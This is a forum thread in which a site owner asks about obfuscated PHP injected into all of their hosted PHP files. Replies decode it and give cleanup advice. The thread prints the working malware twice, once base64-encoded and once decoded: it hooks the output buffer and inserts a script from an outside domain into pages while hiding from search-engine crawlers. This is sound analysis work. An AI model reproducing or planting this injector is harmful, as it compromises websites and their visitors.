Some eval code infected in all my php files. What is it?

Not sure what this code is but it was in all my php files in my go daddy hosting account when I went to my site through google it took me to a "your sites infected page" I managed to restore and fix all the files but not sure if it will come back. What can I do to prevent this?

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5alpXTm9hWEpsWTI5dExtTnZiUzlxY3k1d2FIQWlQand2YzJOeWFYQjBQZz09Iik7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?>
<?php

Code (markup):

 

Decodes to:

<?php
  if (function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
      $GLOBALS['mr_no'] = 1;
      if (!function_exists('mrobh')) {
          if (!function_exists('gml')) {
              function gml()
              {
                  if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"], "yahoo"))) {
                      return "<script src=\"http://cechirecom.com/js.php\"></script>";
                  }
                  return "";
              }
          }
          if (!function_exists('gzdecode')) {
              function gzdecode($R5A9CF1B497502ACA23C8F611A564684C)
              {
                  $R30B2AB8DC1496D06B230A71D8962AF5D = @ord(@substr($R5A9CF1B497502ACA23C8F611A564684C, 3, 1));
                  $RBE4C4D037E939226F65812885A53DAD9 = 10;
                  $RA3D52E52A48936CDE0F5356BB08652F2 = 0;
                  if ($R30B2AB8DC1496D06B230A71D8962AF5D & 4) {
                      $R63BEDE6B19266D4EFEAD07A4D91E29EB = @unpack('v', substr($R5A9CF1B497502ACA23C8F611A564684C, 10, 2));
                      $R63BEDE6B19266D4EFEAD07A4D91E29EB = $R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                      $RBE4C4D037E939226F65812885A53DAD9 += 2 + $R63BEDE6B19266D4EFEAD07A4D91E29EB;
                  }
                  if ($R30B2AB8DC1496D06B230A71D8962AF5D & 8) {
                      $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C, chr(0), $RBE4C4D037E939226F65812885A53DAD9) + 1;
                  }
                  if ($R30B2AB8DC1496D06B230A71D8962AF5D & 16) {
                      $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C, chr(0), $RBE4C4D037E939226F65812885A53DAD9) + 1;
                  }
                  if ($R30B2AB8DC1496D06B230A71D8962AF5D & 2) {
                      $RBE4C4D037E939226F65812885A53DAD9 += 2;
                  }
                  $R034AE2AB94F99CC81B389A1822DA3353 = @gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C, $RBE4C4D037E939226F65812885A53DAD9));
                  if ($R034AE2AB94F99CC81B389A1822DA3353 === false) {
                      $R034AE2AB94F99CC81B389A1822DA3353 = $R5A9CF1B497502ACA23C8F611A564684C;
                  }
                  return $R034AE2AB94F99CC81B389A1822DA3353;
              }
          }
          function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B)
          {
              header('Content-Encoding: none');
              $RA179ABD3A7B9E28C369F7B59C51B81DE = gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
              if (preg_match('/\<\/body/si', $RA179ABD3A7B9E28C369F7B59C51B81DE)) {
                  return preg_replace('/(\<\/body[^\>]*\>)/si', gml() . "\n" . '$1', $RA179ABD3A7B9E28C369F7B59C51B81DE);
              } else {
                  return $RA179ABD3A7B9E28C369F7B59C51B81DE . gml();
              }
          }
          ob_start('mrobh');
      }
  }
?>

PHP:

 

Looks like it creates a malicious output buffer handler then when your scripts finish executing, it adds its little redirect code in there before flushing it to the browser (But it makes sure not to output the malicious redirect if it detects that googlebot or yahoo are spidering your site).

 

Thanks for the info. I hope restoring everything fixed this so they can't do it again. If not I may have to wipe my server and upload everything again.

 

Change all your passwords and update all your scripts to be sure there's no security holes.

Worst case, switch hosting companies and reinstall your scripts fresh from the publisher.

 

Thanks Brad and yeah if it happens again ill just switch hosting companies.

 

wow, this happened to me today too, sucked ass... but I found a good tutorial to fix it:
www?wpsecuritylock?com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/

If I didn't know how to code myself though, I might not have found any good search terms to find a solution. I decoded the code, and checked the source files, and what not, and researched the firebug. I might not even have noticed if their script didn't totally mess up my wordpress dashboard.


NOTE to moderators (also I couldn't post the link, cause of my post count- - hope that's not against terms, or anything but it's a really helpful link, and it is NOT a link that I'm in anyway affiliated with.)

 

good luck! msg me if you need any help. I will provide support for you for free. I HATE this kind of thing.
just remove ALL that code from your scripts